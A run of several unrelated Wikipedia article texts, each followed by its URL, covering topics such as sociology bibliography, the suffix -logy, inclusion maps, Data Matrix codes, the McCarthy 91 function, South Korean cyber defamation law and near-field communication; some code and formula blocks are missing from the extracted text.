Then we have that
Thismathematical analysis–related article is astub. You can help Wikipedia byexpanding it.
Thisgame theoryarticle is astub. You can help Wikipedia byexpanding it.
|
https://en.wikipedia.org/wiki/Sion%27s_minimax_theorem
|
1800s:Martineau·Tocqueville·Marx·Spencer·Le Bon·Ward·Pareto·Tönnies·Veblen·Simmel·Durkheim·Addams·Mead·Weber·Du Bois·Mannheim·Elias
Thisbibliography of sociologyis a list of works, organized by subdiscipline, on the subject ofsociology. Some of the works are selected from general anthologies of sociology,[1][2][3][4][5]while other works are selected because they are notable enough to be mentioned in a general history of sociology or one of its subdisciplines.[i]
Sociology studiessocietyusing various methods of empirical investigation to understand humansocial activity, from themicrolevel of individualagencyand interaction to themacrolevel of systems andsocial structure.[6][7][8]
Economic sociology attempts to explaineconomicphenomena. While overlapping with the general study ofeconomicsat times, economic sociology chiefly concentrates on the roles of social relations and institutions.[25]
Industrial sociologyis the sociology oftechnologicalchange,globalization, labor markets, work organization,managerialpractices andemployment relations.[35][36]
Environmental sociologystudies the relationship between society and environment, particularly the social factors that cause environmental problems, the societal impacts of those problems, and efforts to solve the problems.
Demographyis thestatistical studyofhumanpopulation. It encompasses the study of the size, structure and distribution of these populations, and spatial and/or temporal changes in them in response tobirth,migration,aginganddeath.
Urban sociologyrefers the study of social life and human interaction inmetropolitan areas.
Sociology of knowledge refers to the study of the relationship between human thought and the social context within which it arises, as well as of the effects prevailing ideas have on societies.
Traditionally, political sociology has been concerned with the ways in which social trends, dynamics, and structures of domination affect formal political processes, as well as exploring how various social forces work together to change political policies.[67]Now, it is also concerned with the formation of identity through social interaction, the politics of knowledge, and other aspects of social relations.
The sociology of race and ethnic relations refers to the study ofsocial,political, andeconomicrelations betweenracesandethnicitiesat all levels of society, encompassing subjects such asracismandresidential segregation.
The sociology of religion concerns the role ofreligioninsociety, including practices, historical backgrounds, developments, and universal themes.[75]There is particular emphasis on the recurring role of religion in all societies and throughout recorded history.
Sociological theories are complextheoreticalandmethodologicalframeworks used to analyze and explain objects of social study, which ultimately facilitate the organization of sociological knowledge.[78]
Conflict theories, originally influenced byMarxist thought, are perspectives that see societies as defined through conflicts that are produced by inequality.[79]: 34–6Conflict theory emphasizessocial conflict, as well aseconomic inequality,social inequality,oppression, andcrime.
Rational choice theorymodels social behavior as the interaction of utility-maximizing individuals.
Social Exchange Theorymodels social interaction as a series of exchanges between actors who give one another rewards and penalties, which impacts and guides future behavior.George Homans'version of exchange theory specifically argues thatbehavioriststimulus-response principles can explain the emergence of complex social structures.
Making use ofnetwork theory,social network analysisis structural approach to sociology that views norms and behaviors as embedded in chains of social relations.
Sociocyberneticsis the application ofsystems theoryandcyberneticsto sociology.
Structural functionalismis a broad perspective that interprets society as astructurewith interrelated parts.
Symbolic interactionismargues that human behavior is guided by the meanings people construct together in social interaction.
|
https://en.wikipedia.org/wiki/Bibliography_of_sociology
|
-logyis asuffixin the English language, used with words originally adapted fromAncient Greekending in-λογία(-logía).[1]The earliest English examples were anglicizations of the French-logie, which was in turn inherited from theLatin-logia.[2]The suffix became productive in English from the 18th century, allowing the formation of new terms with no Latin or Greek precedent.
The English suffix has two separate main senses, reflecting two sources of the-λογίαsuffix in Greek:[3]
Philologyis an exception: while its meaning is closer to the first sense, the etymology of the word is similar to the second sense.[8]
In English names for fields of study, the suffix-logyis most frequently found preceded by the euphonic connective voweloso that the word ends in-ology.[9]In these Greek words, therootis always a noun and-o-is thecombining vowelfor all declensions of Greek nouns. However, when new names for fields of study are coined in modern English, the formations ending in-logyalmost always add an-o-, except when the root word ends in an "l" or a vowel, as in these exceptions:[10]analogy,dekalogy,disanalogy,genealogy,genethlialogy,hexalogy;herbalogy(a variant ofherbology),mammalogy,mineralogy,paralogy,petralogy(a variant ofpetrology);elogy;heptalogy;antilogy,festilogy;trilogy,tetralogy,pentalogy;palillogy,pyroballogy;dyslogy;eulogy; andbrachylogy.[7]Linguists sometimes jokingly refer tohaplologyashaplogy(subjecting the wordhaplologyto the process of haplology itself).
Permetonymy, words ending in-logyare sometimes used to describe a subject rather than the study of it (e.g.,technology). This usage is particularly widespread in medicine; for example,pathologyis often used simply to refer to "the disease" itself (e.g., "We haven't found the pathology yet") rather than "the study of a disease".
Books, journals, and treatises about a subject also often bear the name of this subject (e.g., the scientific journalEcology).
When appended to other English words, the suffix can also be used humorously to createnonce words(e.g.,beerologyas "the study of beer"). As with otherclassical compounds, adding the suffix to an initial word-stem derived from Greek orLatinmay be used to lend grandeur or the impression of scientific rigor to humble pursuits, as incosmetology("the study of beauty treatment") orcynology("the study of dog training").
The -logy or -ology suffix is commonly used to indicate finite series of art works like books or movies. For paintings, the "tych" suffix is more common (e.g.diptych,triptych). Examples include:
Further terms like duology (two, mostly ingenre fiction) quadrilogy (four) and octalogy (eight) have been coined but are rarely used: for a series of 10, sometimes "decalog" is used (e.g. in theVirgin Decalog) instead of "decalogy".
|
https://en.wikipedia.org/wiki/-logy
|
Inmathematics, ifA{\displaystyle A}is asubsetofB,{\displaystyle B,}then theinclusion mapis thefunctionι{\displaystyle \iota }that sends each elementx{\displaystyle x}ofA{\displaystyle A}tox,{\displaystyle x,}treated as an element ofB:{\displaystyle B:}ι:A→B,ι(x)=x.{\displaystyle \iota :A\rightarrow B,\qquad \iota (x)=x.}
An inclusion map may also be referred to as aninclusion function, aninsertion,[1]or acanonical injection.
A "hooked arrow" (U+21AA↪RIGHTWARDS ARROW WITH HOOK)[2]is sometimes used in place of the function arrow above to denote an inclusion map; thus:ι:A↪B.{\displaystyle \iota :A\hookrightarrow B.}
(However, some authors use this hooked arrow for anyembedding.)
This and other analogousinjectivefunctions[3]fromsubstructuresare sometimes callednatural injections.
Given anymorphismf{\displaystyle f}betweenobjectsX{\displaystyle X}andY{\displaystyle Y}, if there is an inclusion mapι:A→X{\displaystyle \iota :A\to X}into thedomainX{\displaystyle X}, then one can form therestrictionf∘ι{\displaystyle f\circ \iota }off.{\displaystyle f.}In many instances, one can also construct a canonical inclusion into thecodomainR→Y{\displaystyle R\to Y}known as therangeoff.{\displaystyle f.}
Inclusion maps tend to behomomorphismsofalgebraic structures; thus, such inclusion maps areembeddings. More precisely, given a substructure closed under some operations, the inclusion map will be an embedding for tautological reasons. For example, for some binary operation⋆,{\displaystyle \star ,}to require thatι(x⋆y)=ι(x)⋆ι(y){\displaystyle \iota (x\star y)=\iota (x)\star \iota (y)}is simply to say that⋆{\displaystyle \star }is consistently computed in the sub-structure and the large structure. The case of aunary operationis similar; but one should also look atnullaryoperations, which pick out aconstantelement. Here the point is thatclosuremeans such constants must already be given in the substructure.
Inclusion maps are seen inalgebraic topologywhere ifA{\displaystyle A}is astrong deformation retractofX,{\displaystyle X,}the inclusion map yields anisomorphismbetween allhomotopy groups(that is, it is ahomotopy equivalence).
Inclusion maps ingeometrycome in different kinds: for exampleembeddingsofsubmanifolds.Contravariantobjects (which is to say, objects that havepullbacks; these are calledcovariantin an older and unrelated terminology) such asdifferential formsrestrictto submanifolds, giving a mapping in theother direction. Another example, more sophisticated, is that ofaffine schemes, for which the inclusionsSpec(R/I)→Spec(R){\displaystyle \operatorname {Spec} \left(R/I\right)\to \operatorname {Spec} (R)}andSpec(R/I2)→Spec(R){\displaystyle \operatorname {Spec} \left(R/I^{2}\right)\to \operatorname {Spec} (R)}may be differentmorphisms, whereR{\displaystyle R}is acommutative ringandI{\displaystyle I}is anidealofR.{\displaystyle R.}
|
https://en.wikipedia.org/wiki/Inclusion_map
|
AData Matrixis atwo-dimensional codeconsisting of black and white "cells" or dots arranged in either asquareorrectangularpattern, also known as amatrix. The information to be encoded can be text or numeric data. Usual data size is from a few bytes up to 1556bytes. The length of the encoded data depends on the number of cells in the matrix.Error correction codesare often used to increase reliability: even if one or more cells are damaged so it is unreadable, the message can still be read. A Data Matrix symbol can store up to 2,335alphanumericcharacters.
Data Matrix symbols are rectangular, usually square in shape and composed of square "cells" which representbits. Depending on the coding used, a "light" cell represents a 0 and a "dark" cell is a 1, or vice versa. Every Data Matrix is composed of two solid adjacent borders in an "L" shape (called the "finder pattern") and two other borders consisting of alternating dark and light "cells" or modules (called the "timing pattern"). Within these borders are rows and columns of cells encoding information. The finder pattern is used to locate and orient the symbol while the timing pattern provides a count of the number of rows and columns in the symbol. As more data is encoded in the symbol, the number of cells (rows and columns) increases. Each code is unique. Symbol sizes vary from 10×10 to 144×144 in the new version ECC 200, and from 9×9 to 49×49 in the old version ECC 000 – 140.
The most popular application for Data Matrix is marking small items, due to the code's ability to encode fifty characters in a symbol that is readable at 2 or 3 mm2(0.003 or 0.005 sq in) and the fact that the code can be read with only a 20% contrast ratio.[1]A Data Matrix is scalable; commercial applications exist with images as small as 300 micrometres (0.012 in) (laser etched on a 600-micrometre (0.024 in) silicon device) and as large as a 1 metre (3 ft) square (painted on the roof of aboxcar). Fidelity of the marking and reading systems are the only limitation.
The USElectronic Industries Alliance(EIA) recommends using Data Matrix for labeling small electronic components.[2]
Data Matrix codes are becoming common on printed media such as labels and letters. The code can be read quickly by abarcode readerwhich allows the media to be tracked, for example when a parcel has been dispatched to the recipient.
For industrial engineering purposes, Data Matrix codes can be marked directly onto components, ensuring that only the intended component is identified with the data-matrix-encoded data. The codes can be marked onto components with various methods, but within the aerospace industry these are commonly industrial ink-jet, dot-peen marking, laser marking, and electrolytic chemical etching (ECE). These methods give a permanent mark which can last up to the lifetime of the component.
Data Matrix codes are usually verified using specialist camera equipment and software.[further explanation needed]This verification ensures the code conforms to the relevant standards, and ensures readability for the lifetime of the component. After component enters service, the Data Matrix code can then be read by a reader camera, which decodes the Data Matrix data which can then be used for a number of purposes, such as movement tracking or inventory stock checks.
Data Matrix codes, along with other open-source codes such as 1D barcodes can also be read with mobile phones by downloading code specific mobile applications. Although many mobile devices are able to read 2D codes including Data Matrix Code,[3]few extend the decoding to enable mobile access and interaction, whereupon the codes can be used securely and across media; for example, in track and trace, anti-counterfeit, e.govt, and banking solutions.
Data Matrix codes are used in thefood industryinautocodingsystems to prevent food products being packaged and dated incorrectly. Codes are maintained internally on a food manufacturers database and associated with each unique product, e.g. ingredient variations. For each product run the unique code is supplied to the printer. Label artwork is required to allow the 2D Data Matrix to be positioned for optimal scanning. For black on white codes testing isn't required unless print quality is an issue, but all color variations need to be tested before production to ensure they are readable.[citation needed]
In May 2006 a German computer programmer, Bernd Hopfengärtner, created a large Data Matrix in a wheat field (in a fashion similar tocrop circles). The message read "Hello, World!".[4]
Data Matrix symbols are made up of modules arranged within a perimeter finder and timing pattern. It can encode up to 3,116 characters from the entireASCIIcharacter set (with extensions). The symbol consists of data regions which contain modules set out in a regular array. Large symbols contain several regions. Each data region is delimited by a finder pattern, and this is surrounded on all four sides by a quiet zone border (margin). (Note: The modules may be round or square- no specific shape is defined in the standard. For example, dot-peened cells are generally round.)
ECC 200, the newer version of Data Matrix, usesReed–Solomoncodes for error and erasure recovery. ECC 200 allows the routine reconstruction of the entire encoded data string when the symbol has sustained 30% damage, assuming the matrix can still be accurately located. Data Matrix has an error rate of less than 1 in 10 million characters scanned.[5]
Symbols have an even number of rows and an even number of columns. Most of the symbols are square with sizes from 10 × 10 to 144 × 144. Some symbols however are rectangular with sizes from 8×18 to 16×48 (even values only). All symbols using the ECC 200 error correction can be recognized by the upper-right corner module being the same as the background color. (binary 0).
Additional capabilities that differentiate ECC 200 symbols from the earlier standards include:
[6]
Older versions of Data Matrix include ECC 000, ECC 050, ECC 080, ECC 100, ECC 140. Instead of usingReed–Solomoncodes like ECC 200, ECC 000–140 use a convolution-based error correction. Each varies in the amount of error correction it offers, with ECC 000 offering none, and ECC 140 offering the greatest. For error detection at decode time, even in the case of ECC 000, each of these versions also encode acyclic redundancy check(CRC) on the bit pattern. As an added measure, the placement of each bit in the code is determined by bit-placement tables included in the specification. These older versions always have an odd number of modules, and can be made in sizes ranging from 9 × 9 to 49 × 49. All symbols utilizing the ECC 000 through 140 error correction can be recognized by the upper-right corner module being the inverse of the background color. (binary 1).
According to ISO/IEC 16022, "ECC 000–140 should only be used in closed applications where a single party controls both the production and reading of the symbols and is responsible for overall system performance."
Data Matrix was invented byInternational Data Matrix, Inc.(ID Matrix) which was merged into RVSI/Acuity CiMatrix, who were acquired bySiemensAG in October 2005 and Microscan Systems in September 2008. Data Matrix is covered today by severalISO/IECstandards and is in the public domain for many applications, which means it can be used free of any licensing or royalties.
Data Matrix codes useReed–Solomon error correctionover thefinite fieldF256{\displaystyle \mathbb {F} _{256}}(orGF(28)), the elements of which are encoded asbytes of 8 bits; the byteb7b6b5b4b3b2b1b0{\displaystyle b_{7}b_{6}b_{5}b_{4}b_{3}b_{2}b_{1}b_{0}}with a standard numerical value∑i=07bi2i{\displaystyle \textstyle \sum _{i=0}^{7}b_{i}2^{i}}encodes the field element∑i=07biαi{\displaystyle \textstyle \sum _{i=0}^{7}b_{i}\alpha ^{i}}whereα∈F256{\displaystyle \alpha \in \mathbb {F} _{256}}is taken to be a primitive element satisfyingα8+α5+α3+α2+1=0{\displaystyle \alpha ^{8}+\alpha ^{5}+\alpha ^{3}+\alpha ^{2}+1=0}. The primitive polynomial isx8+x5+x3+x2+1{\displaystyle x^{8}+x^{5}+x^{3}+x^{2}+1}, corresponding to the polynomial number 301, with initial root = 1 to obtain generator polynomials. The Reed–Solomon code uses different generator polynomials overF256{\displaystyle \mathbb {F} _{256}}, depending on how many error correction bytes the code adds. The number of bytes added is equal to the degree of the generator polynomial.
For example, in the 10 × 10 symbol, there are 3 data bytes and 5 error correction bytes. The generator polynomial is obtained as:g(x)=(x+α)(x+α2)(x+α3)(x+α4)(x+α5){\displaystyle g(x)=(x+\alpha )(x+\alpha ^{2})(x+\alpha ^{3})(x+\alpha ^{4})(x+\alpha ^{5})},
which gives:g(x)=x5+α235x4+α207x3+α210x2+α244x+α15{\displaystyle g(x)=x^{5}+\alpha ^{235}x^{4}+\alpha ^{207}x^{3}+\alpha ^{210}x^{2}+\alpha ^{244}x+\alpha ^{15}},
or with decimal coefficients:g(x)=x5+62x4+111x3+15x2+48x+228{\displaystyle g(x)=x^{5}+62x^{4}+111x^{3}+15x^{2}+48x+228}.
The encoding process is described in theISO/IECstandard 16022:2006.[7]Open-source software for encoding and decoding the ECC-200 variant of Data Matrix has been published.[8][9]
The diagrams below illustrate the placement of the message data within a Data Matrix symbol. The message is "Wikipedia", and it is arranged in a somewhat complicated diagonal pattern starting near the upper-left corner. Some characters are split in two pieces, such as the initial W, and the third 'i' is in "corner pattern 2" rather than the usual L-shaped arrangement. Also shown are the end-of-message code (marked End), the padding (P) and error correction (E) bytes, and four modules of unused space (X).
The symbol is of size 16×16 (14×14 data area), with 12 data bytes (including 'End' and padding) and 12 error correction bytes. A (255,243,6) Reed Solomon code shortened to (24,12,6) is used. It can correct up to 6 byte errors or erasures.
To obtain the error correction bytes, the following procedure may be carried out:
The generator polynomial specified for the (24,12,6) code, is:g(x)=x12+242x11+100x10+178x9+97x8+213x7+142x6+42x5+61x4+91x3+158x2+153x+41{\displaystyle g(x)=x^{12}+242x^{11}+100x^{10}+178x^{9}+97x^{8}+213x^{7}+142x^{6}+42x^{5}+61x^{4}+91x^{3}+158x^{2}+153x+41},
which may also be written in the form of a matrix of decimal coefficients:
The 12-byte long message "Wikipedia" including 'End', P1 and P2, in decimal coefficients (see the diagrams below for the computation method using ASCII values), is:
Using the procedure forReed-Solomon systematic encoding, the 12 error correction bytes obtained (E1 through E12 in decimal) in the form of the remainder after polynomial division are:
These error correction bytes are then appended to the original message. The resulting coded message has 24 bytes, and is in the form:
or in decimal coefficients:
and in hexadecimal coefficients:
Multiple encoding modes are used to store different kinds of messages. The default mode stores oneASCIIcharacter per 8-bit codeword. Control codes are provided to switch between modes, as shown below.
The C40, Text andX12modes are potentially more compact for storing text messages. They are similar toDEC Radix-50, using character codes in the range 0–39, and three of these codes are combined to make a number up to 403=64000, which is packed into two bytes (maximum value 65536) as follows:
The resulting value of B1 is in the range 0–250. The special value 254 is used to return to ASCII encoding mode.
Character code interpretations are shown in the table below. The C40 and Text modes have four separate sets. Set 0 is the default, and contains codes that temporarily select a different set for the next character. The only difference is that they reverse upper-and lower-case letters. C40 is primarily upper-case, with lower-case letters in set 3; Text is the other way around. Set 1, containing ASCII control codes, and set 2, containing punctuation symbols are identical in C40 and Text mode.
EDIFACTmode uses six bits per character, with four characters packed into three bytes. It can store digits, upper-case letters, and many punctuation marks, but has no support for lower-case letters.
Base 256 mode data starts with a length indicator, followed by a number of data bytes. A length of 1 to 249 is encoded as a single byte,
and longer lengths are stored as two bytes.
It is desirable to avoid long strings of zeros in the coded message, because they become large blank areas in the Data Matrix symbol, which may
cause a scanner to lose synchronization. (The default ASCII encoding does not use zero for this reason.) In order to make that less likely, the
length and data bytes are obscured by adding a pseudorandom value R(n), where n is the position in the byte stream.
Prior to the expiration of US patent 5,612,524[10]in November 2007, intellectual property companyAcacia Technologiesclaimed that Data Matrix was partially covered by its contents. As the patent owner, Acacia allegedly contacted Data Matrix users demanding license fees related to the patent.
Cognex Corporation, a large manufacturer of 2D barcode devices, filed adeclaratory judgmentcomplaint on 13 March 2006 after receiving information that Acacia had contacted its customers demanding licensing fees. On 19 May 2008 Judge Joan N. Ericksen of the U.S. District Court in Minnesota ruled in favor of Cognex.[11]The ruling held that the '524 patent, which claimed to cover a system for capturing and reading 2D symbology codes, is both invalid and unenforceable due toinequitable conductby the defendants during the procurement of the patent.
While the ruling was delivered after the patent expired, it precluded claims for infringement based on use of Data Matrix prior to November 2007.
A German patent application DE 4107020 was filed in 1991, and published in 1992. This patent is not cited in the above US patent applications and might invalidate them.[citation needed]
|
https://en.wikipedia.org/wiki/Data_Matrix
|
TheMcCarthy 91 functionis arecursive function, defined by thecomputer scientistJohn McCarthyas a test case forformal verificationwithincomputer science.
The McCarthy 91 function is defined as
The results of evaluating the function are given byM(n) = 91 for all integer argumentsn≤ 100, andM(n) =n− 10 forn> 100. Indeed, the result of M(101) is also 91 (101 - 10 = 91). All results of M(n) after n = 101 are continually increasing by 1, e.g. M(102) = 92, M(103) = 93.
The 91 function was introduced in papers published byZohar Manna,Amir PnueliandJohn McCarthyin 1970. These papers represented early developments towards the application offormal methodstoprogram verification. The 91 function was chosen for being nested-recursive (contrasted withsingle recursion, such as definingf(n){\displaystyle f(n)}by means off(n−1){\displaystyle f(n-1)}). The example was popularized by Manna's book,Mathematical Theory of Computation(1974). As the field of Formal Methods advanced, this example appeared repeatedly in the research literature.
In particular, it is viewed as a "challenge problem" for automated program verification.
It is easier to reason abouttail-recursivecontrol flow, this is an equivalent (extensionally equal) definition:
As one of the examples used to demonstrate such reasoning, Manna's book includes a tail-recursive algorithm equivalent to the nested-recursive 91 function. Many of the papers that report an "automated verification" (ortermination proof) of the 91 function only handle the tail-recursive version.
This is an equivalentmutuallytail-recursive definition:
A formal derivation of the mutually tail-recursive version from the nested-recursive one was given in a 1980 article byMitchell Wand, based on the use ofcontinuations.
Example A:
Example B:
Here is an implementation of the nested-recursive algorithm inLisp:
Here is an implementation of the nested-recursive algorithm inHaskell:
Here is an implementation of the nested-recursive algorithm inOCaml:
Here is an implementation of the tail-recursive algorithm inOCaml:
Here is an implementation of the nested-recursive algorithm inPython:
Here is an implementation of the nested-recursive algorithm inC:
Here is an implementation of the tail-recursive algorithm inC:
Here is a proof that the McCarthy 91 functionM{\displaystyle M}is equivalent to the non-recursive algorithmM′{\displaystyle M'}defined as:
Forn> 100, the definitions ofM′{\displaystyle M'}andM{\displaystyle M}are the same. The equality therefore follows from the definition ofM{\displaystyle M}.
Forn≤ 100, astrong inductiondownward from 100 can be used:
For 90 ≤n≤ 100,
This can be used to showM(n) =M(101) = 91 for 90 ≤n≤ 100:
M(n) =M(101) = 91 for 90 ≤n≤ 100 can be used as the base case of the induction.
For the downward induction step, letn≤ 89 and assumeM(i) = 91 for alln<i≤ 100, then
This provesM(n) = 91 for alln≤ 100, including negative values.
Donald Knuthgeneralized the 91 function to include additional parameters.[1]John Cowlesdeveloped a formal proof that Knuth's generalized function was total, using theACL2theorem prover.[2]
|
https://en.wikipedia.org/wiki/McCarthy_91_function
|
Cyber defamationorcyber insultin South Korean law is acrimeor civiltortconsisting ofdefamationorinsultcommitted through atelecommunications networksuch as the Internet.
The crime of cyber defamation (사이버 명예훼손죄) is defined in the Information and Communications Network Act, which establishes a maximum term of imprisonment of three years if the insulting information is true and seven years if it is false.[1]South Korea's criminal penalties for cyber defamation have attracted attention for their severity relative to other countries.
The cyber defamation law arose from considerations by theKorea Communications Commission(KCC), South Korea's telecommunications and broadcasting regulator, of revising the telecommunications laws to impose more regulations and deeper scrutiny on major Internet portals.[2]
Public anger over the 2008 suicide of celebrityChoi Jin-sil[3]led to a legislative push for stronger legislation againstcyberbullying, including the adoption of areal name system.[4]Among the legislative items pushed by the government was a cyber insult law, which would have imposed greater penalties than those provided for criminal insult under Article 311 of thePenal Code.[5]The legislation was sometimes referred to as the "Choi Jin-sil Law," although the family objected to this use of her name.[6]The governingGrand National Party(GNP) supported the cyber insult law, while the oppositionDemocratic Partyopposed it.[7]A Research & Research survey of 800 Korean people conducted on 14 January 2009 showed that 60% supported theGNP-led bill dealing with cyber defamation, and 32.1% opposed it.[8]
Opposition to the proposed legislation gained force after the acquittal ofMinervain April 2009, which increased concerns over legislative restrictions onfreedom of expression.[9]The legislation was ultimately not adopted.[10]
South Korean plaintiffs have used cyber defamation law tosubpoenainformation from the United States.[11]In 2024 aCaliforniacourt granted the attorney representingNewJeanspermission to obtain the identity information of aYouTubeuser. Other similar cases includeHYBEon behalf ofBTSseeking the identity of aTwitteruser andStarship Entertainmenton behalf ofWonyoungidentifying an individual behind a YouTube channel with help fromGoogle.[12]
The vast majority of cyber defamation police reports in South Korea arise from online games. League of Legends is a game which is notorious for such acts. In 2015 alone, South Korean law enforcement received and investigated over 8000 reports of cyber defamation; over half of these cases involve League of Legends where players head to police stations as a retaliation after being verbally abused by teammates or opponents.[13]
|
https://en.wikipedia.org/wiki/Cyber_defamation_law
|
Near-field communication(NFC) is a set ofcommunication protocolsthat enablescommunicationbetween two electronic devices over a distance of4 cm (1+1⁄2in) or less.[1]NFC offers a low-speed connection through a simple setup that can be used for thebootstrappingof capable wireless connections.[2]Like otherproximity cardtechnologies, NFC is based oninductive couplingbetween twoelectromagnetic coilspresent on a NFC-enabled device such as asmartphone. NFC communicating in one or both directions uses a frequency of 13.56 MHz in the globally available unlicensedradio frequencyISM band, compliant with theISO/IEC 18000-3air interface standard at data rates ranging from 106 to 848 kbit/s.
TheNFC Forumhas helped define and promote the technology, setting standards for certifying device compliance.[3][4]Secure communications are available by applying encryption algorithms as is done for credit cards[5]and if they fit the criteria for being considered apersonal area network.[6]
NFC standards cover communications protocols and data exchange formats and are based on existingradio-frequency identification(RFID) standards includingISO/IEC 14443andFeliCa.[7]The standards include ISO/IEC 18092[8]and those defined by the NFC Forum. In addition to the NFC Forum, theGSMAgroup defined a platform for the deployment of GSMA NFC Standards[9]within mobile handsets. GSMA's efforts include Trusted Services Manager,[10][11]Single Wire Protocol, testing/certification and secure element.[12]NFC-enabled portable devices can be provided withapplication software, for example to read electronic tags or make payments when connected to an NFC-compliant system. These are standardized to NFC protocols, replacing proprietary technologies used by earlier systems.
A patent licensing program for NFC is under deployment by France Brevets, a patent fund created in 2011. This program was under development by Via Licensing Corporation, an independent subsidiary ofDolby Laboratories, and was terminated in May 2012.[13]A platform-independentfree and open sourceNFC library,libnfc, is available under theGNU Lesser General Public License.[14][15]
Present and anticipated applications include contactless transactions, data exchange and simplified setup of more complex communications such asWi-Fi.[16]In addition, when one of the connected devices has Internet connectivity, the other can exchange data with online services.[citation needed]
Near-field communication (NFC) technology not only supports data transmission but also enables wireless charging, providing a dual-functionality that is particularly beneficial for small, portable devices. The NFC Forum has developed a specific wireless charging specification, known as NFC Wireless Charging (WLC), which allows devices to charge with up to 1W of power over distances of up to2 cm (3⁄4in).[17]This capability is especially suitable for smaller devices like earbuds, wearables, and other compact Internet of Things (IoT) appliances.[17]
Compared to the more widely knownQi wireless chargingstandard by theWireless Power Consortium, which offers up to 15W of power over distances up to4 cm (1+5⁄8in), NFC WLC provides a lower power output but benefits from a significantly smaller antenna size.[17]This makes NFC WLC an ideal solution for devices where space is at a premium and high power charging is less critical.[17]
The NFC Forum also facilitates a certification program, labeled as Test Release 13.1 (TR13.1), ensuring that products adhere to the WLC 2.0 specification. This certification aims to establish trust and consistency across NFC implementations, minimizing risks for manufacturers and providing assurance to consumers about the reliability and functionality of their NFC-enabled wireless charging devices.[17]
NFC is rooted inradio-frequency identificationtechnology (known as RFID) which allows compatible hardware to both supply power to and communicate with an otherwise unpowered and passive electronic tag using radio waves. This is used for identification, authentication andtracking. Similar ideas in advertising and industrial applications were not generally successful commercially, outpaced by technologies such asQR codes,barcodesandUHFRFIDtags.[citation needed]
Ultra-wideband(UWB) another radio technology has been hailed as a future possible alternatives to NFC technology due to further distances of data transmission, as well as Bluetooth and wireless technology.[55]
NFC is a set of short-range wireless technologies, typically requiring a separation of10 cm (3+7⁄8in) or less. NFC operates at 13.56MHzonISO/IEC 18000-3air interface and at rates ranging from 106 kbit/s to 424 kbit/s. NFC always involves an initiator and a target; the initiator actively generates anRFfield that can power a passive target. This enables NFC targets to take very simple form factors such as unpowered tags, stickers, key fobs, or cards. NFC peer-to-peer communication is possible, provided both devices are powered.[56]
NFC tags contain data and are typically read-only, but may be writable. They can be custom-encoded by their manufacturers or use NFC Forum specifications. The tags can securely store personal data such as debit and credit card information, loyalty program data, PINs and networking contacts, among other information. The NFC Forum defines five types of tags that provide different communication speeds and capabilities in terms of configurability, memory, security,data retentionand write endurance.[57]
As withproximity cardtechnology, NFC usesinductive couplingbetween two nearbyloop antennaseffectively forming an air-coretransformer. Because the distances involved are tiny compared to thewavelengthofelectromagnetic radiation(radio waves) of that frequency (about 22 metres), the interaction is described asnear field. An alternatingmagnetic fieldis the main coupling factor and almost no power is radiated in the form ofradio waves(which are electromagnetic waves, also involving an oscillatingelectric field); that minimises interference between such devices and any radio communications at the same frequency or with other NFC devices much beyond its intended range. NFC operates within the globally available and unlicensedradio frequencyISM bandof 13.56 MHz. Most of the RF energy is concentrated in the ±7 kHz bandwidth allocated for that band, but the emission'sspectral widthcan be as wide as 1.8 MHz[58]in order to support high data rates.
Working distance with compact standard antennas and realistic power levels could be up to about20 cm (7+7⁄8in) (but practically speaking, working distances never exceed10 cm or3+7⁄8in). Note that because the pickup antenna may be quenched in aneddy currentby nearby metallic surfaces, the tags may require a minimum separation from such surfaces.[59]
The ISO/IEC 18092 standard supports data rates of 106, 212 or 424kbit/s.
The communication takes place between an active "initiator" device and a target device which may either be:
NFC employs two differentcodingsto transfer data. If an active device transfers data at 106 kbit/s, a modifiedMiller codingwith 100 percentmodulationis used. In all other casesManchester codingis used with a modulation ratio of 10 percent.
Every active NFC device can work in one or more of three modes:
NFC tags are passive data stores which can be read, and under some circumstances written to, by an NFC device. They typically contain data (as of 2015[update]between 96 and 8,192 bytes) and are read-only in normal use, but may be rewritable. Applications include secure personal data storage (e.g.debitorcredit cardinformation,loyalty programdata,personal identification numbers(PINs), contacts). NFC tags can be custom-encoded by their manufacturers or use the industry specifications.
Although the range of NFC is limited to a few centimeters, standard plain NFC is not protected againsteavesdroppingand can be vulnerable to data modifications. Applications may use higher-layercryptographic protocolsto establish a secure channel.
The RF signal for the wireless data transfer can be picked up with antennas. The distance from which an attacker is able to eavesdrop the RF signal depends on multiple parameters, but is typically less than 10 meters.[60]Also, eavesdropping is highly affected by the communication mode. A passive device that doesn't generate its own RF field is much harder to eavesdrop on than an active device. An attacker can typically eavesdrop within 10 m of an active device and 1 m for passive devices.[61]
Because NFC devices usually includeISO/IEC 14443protocols,relay attacksare feasible.[62][63][64][page needed]For this attack the adversary forwards the request of the reader to the victim and relays its answer to the reader in real time, pretending to be the owner of the victim's smart card. This is similar to aman-in-the-middle attack.[62]Onelibnfccode example demonstrates a relay attack using two stock commercial NFC devices. This attack can be implemented using only two NFC-enabled mobile phones.[65]
NFC standards cover communications protocols and data exchange formats, and are based on existing RFID standards includingISO/IEC 14443andFeliCa.[7]The standards include ISO/IEC 18092[8]and those defined by the NFC Forum.
NFC is standardized in ECMA-340 and ISO/IEC 18092. These standards specify the modulation schemes, coding, transfer speeds and frame format of the RF interface of NFC devices, as well as initialization schemes and conditions required for data collision-control during initialization for both passive and active NFC modes. They also define thetransport protocol, including protocol activation and data-exchange methods. The air interface for NFC is standardized in:
NFC incorporates a variety of existing standards includingISO/IEC 14443Type A and Type B, andFeliCa(also simply named F or NFC-F). NFC-enabled phones work at a basic level with existing readers. In "card emulation mode" an NFC device should transmit, at a minimum, a unique ID number to a reader. In addition, NFC Forum defined a common data format calledNFC Data Exchange Format(NDEF) that can store and transport items ranging from anyMIME-typed object to ultra-short RTD-documents,[68]such asURLs. The NFC Forum added theSimple NDEF Exchange Protocol(SNEP) to the spec that allows sending and receiving messages between two NFC devices.[69]
TheGSM Association (GSMA)is a trade association representing nearly 800 mobile telephony operators and more than 200 product and service companies across 219 countries. Many of its members have led NFC trials and are preparing services for commercial launch.[70]
GSM is involved with several initiatives:
StoLPaN (Store Logistics and Payment with NFC) is a pan-European consortium supported by theEuropean Commission'sInformation Society Technologiesprogram. StoLPaN will examine the potential for NFC local wireless mobile communication.[74]
NFC Forum is a non-profit industry association formed on March 18, 2004, byNXP Semiconductors,SonyandNokiato advance the use of NFC wireless interaction in consumer electronics, mobile devices and PCs. Its specifications include the five distinct tag types that provide different communication speeds and capabilities covering flexibility, memory, security, data retention and write endurance. NFC Forum promotes implementation and standardization of NFC technology to ensure interoperability between devices and services. As of January 2020, the NFC Forum had over 120 member companies.[75]
